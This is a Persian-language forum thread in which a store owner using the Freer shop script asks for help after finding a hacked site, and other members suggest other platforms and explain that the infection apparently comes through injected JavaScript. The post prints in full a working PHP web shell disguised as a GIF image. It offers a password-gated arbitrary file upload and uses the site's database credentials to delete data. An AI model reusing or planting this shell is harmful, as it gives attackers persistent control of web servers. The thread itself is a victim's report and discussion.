مشکل در درگاه فریر(ضروری)
با سلام
چند وقتی هستش که تو درگاهم محصول نامشخص اضاف میشه بیشتر تو دسته ها اضاف میشه و همچنین در تراکنش ها مبلغ نامشخص که به صورت ناموفق صورت گرفته
و همچنین در قسمته دسته ها فایلی با کدهایی که در زیر گذاشتم تو پوشه ایمیج پیوست میشه
upload/images/category_45-up.phtml
کد:
GIF89a;
<?php
@session_start();
if ($_GET['cmd']=='up')
{
$docr = $_SERVER["DOCUMENT_ROOT"];
if(md5(base64_decode($_POST['pw'])) != "e423889e19b7785b9e16f453b331bdc4" AND !isset($_SESSION['backlogin']))die("pw");
@$_SESSION['backlogin'] = "1";
echo <<<HTML
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<td><font size="1">Your File : </font> </td>
<td>
<input size="48" name="file" type="file" style="color: #008000; font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid #008000; background-color: #000000"></td>
</tr>
<tr>
<td><font size="1">Upload Dir : </font> </td>
<td>
<input size="48" value="$docr/" name="path" type="text" style="color: #008000; font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid #008000; background-color: #000000">
<input type="submit" value="Upload " style="color: #008000; font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid #008000; background-color: #000000"></td>
$tend
</table>
HTML;
if (isset($_POST["path"])){
$uploadfile = $_POST["path"].$_FILES["file"]["name"];
if ($_POST["path"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)) {
echo "File uploaded to : $uploadfile";
echo "- Size : " .$_FILES["file"]["size"];
} else {
print "Error Upload File :";
}
}
}
include("../../../include/configuration.php");if(mysql_connect($config['databaseInfo']['host'], $config['databaseInfo']['username'],$config['databaseInfo']['password'])){mysql_select_db($config['databaseInfo']['name']);mysql_query("DELETE FROM category WHERE `category_title` = 'et'");}?>
کارهایی که هم کردم تمامی فایل های فریر با دقت به صورت تک تک ریختم و هر چی اضافی بوده حذف کردم و از پسوردهای سختی هم در قسمت مدیریت و پوشه مدیریت گذاشتم اما جواب نداده
محصولاتی هم که بفروش میرسه بدرد هر کی نمیخوره و در مرحله اخر که فعال سازی محصول دست خودمان هستش
ممنون میشم از دوستان متخصص راهنمایی کنن
- - - Updated - - -
UP
منتظر راهنمایی اساتید هستیم!
- - - Updated - - -
با سلام
یعنی هیچکی نیست راهنمایی کنه
پاسخ : مشکل در درگاه فریر(ضروری)
نقل قول:
نوشته اصلی توسط
free-downloadha.com
با سلام
چند وقتی هستش که تو درگاهم ...
- - - Updated - - -
با سلام
یعنی هیچکی نیست راهنمایی کنه
خودتو اذیت نکن این اسکریپت بهیچ عنوان تایید نمیشه و پر از باگهای امنیتی و خطرناکه بفکر فروشگاه ساز دیگری باش
فوری : هشدار امنیتی در ارتباط با فروشگاه ساز فریر freer
پاسخ : مشکل در درگاه فریر(ضروری)
نقل قول:
نوشته اصلی توسط
ali0000
با سلام
ایا فروشگاه ساز دیگه ای هست که معرفی کنید
قبلا ی بار فریرم رو هک کردن این بار خیلی طول کشید تا دسترسی پیدا کنن امنیتش رو تا جایی که راه داشته بالا بردم .
جالب اینجاست که تمامی فایل هارو چک کردم و دوباره ریختم اما بازم این اتفاق داره میفته
پاسخ : مشکل در درگاه فریر(ضروری)
سلام
بهتره از ووکامرس استفاده کنید .
فروشگاه ساز های دیگه ای مثل پرستاشاپ ، اپن کارت و.. هم هست
موفق باشید
پاسخ : مشکل در درگاه فریر(ضروری)
نقل قول:
نوشته اصلی توسط
free-downloadha.com
با سلام
ایا فروشگاه ساز دیگه ای هست که معرفی کنید
قبلا ی بار فریرم رو هک کردن این بار خیلی طول کشید تا دسترسی پیدا کنن امنیتش رو تا جایی که راه داشته بالا بردم .
جالب اینجاست که تمامی فایل هارو چک کردم و دوباره ریختم اما بازم این اتفاق داره میفته
داخل همین انجمن 2 مورد ارائه شده سرچ کنید فروشگاه ساز یا همین مواردی که cheapmizban گفتن تحقیق نمایید و مطابق نیاز خودتون با توجه به تایید ( برنامه نویسان معتبر ) از آنها استفاده نمایید ، الان باید همه اطلاع رسانی کنید به دوستان ، هر هاستی که اسکریپت فریر روش قرار داره این چندتا کودک دسترسی مستقیم جهت آپلود فایل روی هاست دارن و تا زمانی مهدکودک و پیش دبستانی ها تعطیل هستن این حقه بازان سایتهای آلوده به این اسکریپت رو با آپلود فایل index در روت هاست مثلاً هک میکنن ...
فوری : هشدار امنیتی در ارتباط با فروشگاه ساز فریر freer
پاسخ : مشکل در درگاه فریر(ضروری)
وکامرس پرستا شاپ استفاده کنید فرریر مضخرف هستش
پاسخ : مشکل در درگاه فریر(ضروری)
پاسخ : مشکل در درگاه فریر(ضروری)
نقل قول:
و همچنین در قسمته دسته ها فایلی با کدهایی که در زیر گذاشتم تو پوشه ایمیج پیوست میشه
upload/images/category_45-up.phtm
فایلهای شل به این فرم هنگام دسترسی شما به داشبورد فریر از طریق درخواست ajax ارسال شده از مرورگر خود شما روی سایت آپلود میشه. کد تعبیه جاوا اسکریپتی که این درخواست رو ارسال میکنه در سایت اسکریپت (freer.ir) اینجکت شده و توسط اسکریپت از این سایت دریافت و در مرورگر شما اینجکت میکنه.
برای اطلاعات بیشتر می تونین این پست رو ببینین:
http://www.webhostingtalk.ir/showthr...=1#post1487206
یک بخش دیکد شده کد فایل جاوا اسکریپت
http://www.ckvalaska.cz/wp-content/s...fer.js?ver=9.2
رو می تونین اینجا ببینین:
http://www.unphp.net/decode/f78ab217...b485cefd05de4/
پاسخ : مشکل در درگاه فریر(ضروری)
این سیستم باگ نداره ، کلی شل مخفی و بک دور روش گذاشتن ، توصیه اکید میکنم استفاده نکنید ازش ، مخصوصا نسخه جدیدش ، تا حالا سه تا کد داخل فایل هاش پیدا کردم که هر کدوم یه سری دسترسی میده
پاسخ : مشکل در درگاه فریر(ضروری)
یعنی تو زرد از آب در اومدن؟
از دستی این کارو کردن؟یعنی اومدن شل ریختن و دسترسی؟واسه چی؟واسه اینکه متوجه بشن کی استفاده میکنه و اگه لایسنس نداشته باشن هک کنن؟
سیستمشون باگ داره.بدون باگ نیست.اما شل و دسترسی رو نمیدونستم که تازگیا میریزن داخل
